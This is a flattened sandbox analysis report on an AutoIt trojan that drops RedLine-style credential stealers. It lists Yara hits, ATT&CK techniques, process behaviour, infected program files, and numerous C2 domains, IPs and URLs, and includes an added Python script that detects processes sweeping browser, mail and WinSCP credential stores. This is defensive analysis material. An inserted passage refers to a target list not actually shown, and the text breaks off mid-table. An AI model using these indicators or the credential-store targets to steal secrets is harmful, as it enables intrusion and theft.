Source: AENiBH7X1q.exe, 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: AENiBH7X1q.exe; Binary or memory string: WIN_XP
Source: AENiBH7X1q.exe; Binary or memory string: WIN_XPe
Source: AENiBH7X1q.exe; Binary or memory string: WIN_VISTA
Source: AENiBH7X1q.exe; Binary or memory string: WIN_7
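The file and registry targets listed above are the credential stores a stealer sweeps in one run: Chromium "Login Data" and "Cookies" databases, Gecko profile indexes and cookies.sqlite, an FTP client's site list, WinSCP sessions, MAPI profiles and IncrediMail identities. The following Python script is an added triage example, not part of the Joe Sandbox report: it classifies endpoint file-open and key-open events against exactly that list and flags any process that is not the application owning the store. The event schema (image, operation, target), the owner process names in EXPECTED_OWNERS and the SAMPLE_EVENTS are assumptions constructed to mirror the report's observations for microsofts.exe.

```python
"""Triage of credential-store access, keyed to the artifacts the report lists.

Added example; not part of the Joe Sandbox report. The event schema, the
owner process names and SAMPLE_EVENTS are assumptions for illustration.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class AccessEvent:
    image: str      # full path of the process performing the access (assumed schema)
    operation: str  # "FileOpen" or "RegOpen"
    target: str     # file path or registry key that was opened


# Stores the report shows microsofts.exe opening. Patterns match the tail of
# the path so any user profile or browser profile directory is covered.
CREDENTIAL_STORE_PATTERNS: Dict[str, str] = {
    "chromium_login_data": r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\Login Data$",
    "chromium_cookies": r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\Network\\Cookies$",
    "firefox_cookies": r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$",
    "gecko_profiles_ini": r"\\(Mozilla\\Firefox|Thunderbird|8pecxstudios\\Cyberfox|NETGATE Technologies\\BlackHawk)\\profiles\.ini$",
    "ftp_navigator_list": r"\\FTP Navigator\\Ftplist\.txt$",
    "winscp_sessions": r"^HKEY_CURRENT_USER\\SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions$",
    "mapi_profiles": r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles$",
    "incredimail_identities": r"^HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities$",
}

# Process images that legitimately open each store (assumed names). Any other
# image reading the store is a theft candidate; stores with no entry are
# always flagged.
EXPECTED_OWNERS: Dict[str, set] = {
    "chromium_login_data": {"chrome.exe", "msedge.exe"},
    "chromium_cookies": {"chrome.exe", "msedge.exe"},
    "firefox_cookies": {"firefox.exe"},
    "gecko_profiles_ini": {"firefox.exe", "thunderbird.exe"},
    "winscp_sessions": {"winscp.exe"},
    "mapi_profiles": {"outlook.exe"},
}


def classify(target: str) -> Optional[str]:
    """Return the credential-store category a path or key belongs to, if any."""
    for category, pattern in CREDENTIAL_STORE_PATTERNS.items():
        if re.search(pattern, target, re.IGNORECASE):
            return category
    return None


def triage(events: List[AccessEvent]) -> Dict[str, List[str]]:
    """Map each non-owner process image to the store categories it opened."""
    hits = defaultdict(set)
    for ev in events:
        category = classify(ev.target)
        if category is None:
            continue
        image = ev.image.rsplit("\\", 1)[-1].lower()
        if image in EXPECTED_OWNERS.get(category, set()):
            continue  # the owning application reading its own store
        hits[image].add(category)
    return {image: sorted(cats) for image, cats in hits.items()}


def stealer_suspects(events: List[AccessEvent], min_categories: int = 2) -> List[str]:
    """Images that read stores of at least min_categories distinct kinds.

    A backup tool may copy one store; a stealer sweeps browsers, mail and
    FTP/SSH clients in a single run, which is the pattern the report shows.
    """
    return sorted(img for img, cats in triage(events).items() if len(cats) >= min_categories)


_U = r"C:\Users\user\AppData"
_M = r"C:\Users\user\AppData\Local\Temp\microsofts.exe"
SAMPLE_EVENTS = [  # constructed, modelled on the report's "File opened" / "Key opened" lines
    AccessEvent(_M, "FileOpen", _U + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent(_M, "FileOpen", _U + r"\Local\Microsoft\Edge\User Data\Default\Login Data"),
    AccessEvent(_M, "FileOpen", _U + r"\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    AccessEvent(_M, "FileOpen", _U + r"\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite"),
    AccessEvent(_M, "FileOpen", _U + r"\Roaming\Thunderbird\profiles.ini"),
    AccessEvent(_M, "RegOpen", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    AccessEvent(_M, "RegOpen", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    # Benign: the browser reading its own store, a tool touching a single store, unrelated I/O
    AccessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "FileOpen",
                _U + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent(r"C:\Program Files\7-Zip\7z.exe", "FileOpen", _U + r"\Roaming\Thunderbird\profiles.ini"),
    AccessEvent(r"C:\Windows\explorer.exe", "FileOpen", r"C:\Users\user\Documents\notes.txt"),
]

if __name__ == "__main__":
    for image, cats in triage(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(cats)}")
    print("suspects:", stealer_suspects(SAMPLE_EVENTS))
```

Against the constructed events, chrome.exe is ignored because it owns the store it reads, 7z.exe shows up in the triage map with a single category but stays under the two-category threshold, and microsofts.exe is the only suspect, with six distinct store kinds. The owner allowlist is what keeps the rule quiet on a normal desktop; the category threshold is what separates a backup or migration tool from a sweep like the one recorded above.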

Remote Access Functionality

Source: Yara match; File source: 3.3.microsofts.exe.5a0000.916.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5b0000.935.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.915.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.1054.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5e0000.1088.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.0.Native_Redline_BTC.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5b0000.1083.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5c0000.1089.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.6200000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5e0000.1085.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5b0000.936.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5f0000.976.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5c0000.1090.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.1053.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.1107.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5e0000.1087.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.6200000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5f0000.975.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5d0000.1151.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5f0000.1055.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5e0000.1084.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5b0000.1127.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5b0000.1128.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.1108.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5a0000.1152.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5c0000.1109.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5e0000.1086.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.600000.1082.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.3.microsofts.exe.5d0000.1150.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000003.2390841675.0000000007550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.2105969324.0000000000AB2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.2396891377.0000000007550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2121412758.0000000006200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000003.2107829851.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, type: DROPPED
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12ec4d08.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12ec4d08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12f0ff50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12f0ff50.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.0.build.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12f5b188.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.Native_Redline_BTC.exe.12f5b188.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2126254452.0000000012F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Native_Redline_BTC.exe PID: 1900, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: build.exe PID: 1412, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: C:\Users\user\Desktop\AENiBH7X1q.exe; Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
Source: C:\Users\user\Desktop\AENiBH7X1q.exe; Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
Source: C:\Users\user\Desktop\AENiBH7X1q.exe; Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
MITRE ATT&CK Matrix

The matrix was flattened by extraction; it is rebuilt here as a per-tactic list of the techniques the matrix marks with a signature count (the number before each technique is the count as extracted from the matrix cell). Matrix cells without a count, including every Reconnaissance, Resource Development and Exfiltration technique, are omitted.

Initial Access: 2 Valid Accounts
Execution: 121 Windows Management Instrumentation; 21 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 Service Execution
Persistence: 2 LSASS Driver; 1 DLL Side-Loading; 2 Valid Accounts; 1 Windows Service; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 2 LSASS Driver; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 1 Windows Service; 212 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder
Defense Evasion: 111 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 322 Masquerading; 2 Valid Accounts; 151 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection
Credential Access: 2 OS Credential Dumping; 121 Input Capture; 1 Credentials in Registry
Discovery: 11 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 138 System Information Discovery; 1 Query Registry; 431 Security Software Discovery; 151 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
Lateral Movement: 1 Taint Shared Content
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 121 Input Capture; 4 Clipboard Data
Command and Control: 4 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 4 Non-Application Layer Protocol; 125 Application Layer Protocol
Impact: 1 System Shutdown/Reboot
Behavior Graph (text rendering of the graph; numbers in parentheses are the graph's node IDs)

Behavior Graph ID: 1549472; Sample: AENiBH7X1q.exe; Start date: 05/11/2024; Architecture: WINDOWS; Score: 100

Top level (2): contacts zyiexezl.biz, zlenh.biz and 85 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures. Starts AENiBH7X1q.exe (11), alg.exe (14), AppVClient.exe (17) and 20 other processes (19).

  AENiBH7X1q.exe (11): Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces; Contains functionality to detect sleep reduction / modifications. Starts svchost.exe (21).
    svchost.exe (21): drops C:\Users\user\AppData\...\microsofts.exe (PE32), C:\Users\user\...\Native_Redline_BTC.exe (PE32) and C:\Program Files (x86)\...\armsvc.exe (PE32). Signatures: Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html). Starts microsofts.exe (25) and Native_Redline_BTC.exe (30).
      microsofts.exe (25): contacts s82.gocheapweb.com 51.195.88.199 (ports 49711, 587, 59400; OVH, FR, France), wxgzshna.biz 72.52.178.23 (ports 61997, 61999, 62004; LIQUIDWEB, US, United States) and 8 other IPs or domains. Drops C:\Windows\System32\wbengine.exe (PE32+), C:\Windows\System32\wbem\WmiApSrv.exe (PE32+), C:\Windows\System32\vds.exe (PE32+) and 140 other malicious files. Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 5 other signatures.
      Native_Redline_BTC.exe (30): drops C:\Users\user\AppData\...\server_BTC.exe (PE32) and C:\Users\user\AppData\Local\Temp\build.exe (PE32). Starts server_BTC.exe (32) and build.exe (36).
        server_BTC.exe (32): drops C:\Users\user\AppData\...\TrojanAIbot.exe (PE32). Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender. Starts powershell.exe (39), cmd.exe (42), schtasks.exe (44) and TrojanAIbot.exe (46).
          powershell.exe (39): Loading BitLocker PowerShell Module. Starts conhost.exe (48), conhost.exe (50) and WmiPrvSE.exe (52).
          cmd.exe (42): starts conhost.exe (54) and timeout.exe (56).
        build.exe (36): contacts 212.162.149.53 (ports 2049, 49708, 59397; UNREAL-SERVERS, US, Netherlands).
  alg.exe (14): contacts yauexmxk.biz 18.208.156.248 (ports 59550, 59646, 59666; AMAZON-AES, US, United States), htwqzczce.biz 172.234.222.138 (ports 59394, 59396, 59527; AKAMAI-ASN1, EU, United States) and 12 other IPs or domains. Signatures: Creates files in the system32 config directory; Contains functionality to behave differently if execute on a Russian/Kazak computer.
  AppVClient.exe (17).
  20 other processes (19): Creates files inside the volume driver (system volume information); Found direct / indirect Syscall (likely to bypass EDR).

Source | Detection | Scanner | Label
AENiBH7X1q.exe | 46% | ReversingLabs | Win32.Trojan.AutoitInject
AENiBH7X1q.exe | 100% | Avira | TR/AD.Nekark.mpdfl
AENiBH7X1q.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML |
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                    18.141.10.107
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      jdhhbs.biz
                                                                                                                                                                                      13.251.16.150
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        zrlssa.biz
                                                                                                                                                                                        44.221.84.105
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          anpmnmxo.biz
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                            zjbpaao.biz
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknowntrue
                                                                                                                                                                                              uhxqin.biz
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknowntrue
                                                                                                                                                                                                zlenh.biz
                                                                                                                                                                                                unknown
                                                                                                                                                                                                unknowntrue
                                                                                                                                                                                                  muapr.biz
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                                    lejtdj.biz
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    unknowntrue
Name | Malicious | Antivirus Detection | Reputation
http://lpuegx.biz/oiarwfji | false
http://jpskm.biz/yiteaphcawxhusdi | false
http://acwjcqqv.biz/boysd | false
http://brsua.biz/usismcqqdljny | false
http://dlynankz.biz/ls | false
http://xccjj.biz/ivdmudcsfvhy | false
http://knjghuig.biz/vydffyeediqodv | false
http://wllvnzb.biz/kfabynhosjjh | false
http://mnjmhp.biz/rwhorjnmac | false
http://yhqqc.biz/bwancadkaqtlbx | false
http://deoci.biz/dxiykgktglw | true
http://mnjmhp.biz/ix | false
http://yunalwv.biz/ubujpwkxvgqviqf | false
http://hehckyov.biz/tssrdd | false
http://tnevuluw.biz/iih | false
http://tnevuluw.biz/kykfeohkixf | false
http://ctdtgwag.biz/cngo | false
http://banwyw.biz/hmfdteob | false
http://cvgrf.biz/pkljfdj | false
http://gnqgo.biz/uayanvrydqdv | true
http://ifsaia.biz/b | false
http://lpuegx.biz/tookpqdumsvuivi | false
http://rrqafepng.biz/tmdyfv | false
http://vjaxhpbji.biz/dh | false
http://myups.biz/mwix | false
http://myups.biz/ahktjonxxxw | false
http://pwlqfu.biz/yk | false
http://ytctnunms.biz/fgdugwxcbebce | false
http://bghjpy.biz/qtclvagsdhvow | false
http://npukfztj.biz/jsr | false
http://lpuegx.biz/tqkivcurvenplovb | false
http://pectx.biz/opniaqqvrov | false
http://rynmcq.biz/rsstpsksfhdhf | false
http://pywolwnvd.biz/bimwjsl | false
http://wllvnzb.biz/glpq | false
Name | Source | Malicious | Antivirus Detection | Reputation
http://tempuri.org/Entity/Id24LR | build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmp | false
http://18.141.10.107/ngs | alg.exe, 00000005.00000003.2652374173.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2661319349.000000000046C000.00000004.00000020.00020000.00000000.sdmp | false
http://tempuri.org/Entity/Id2ResponsehD | build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 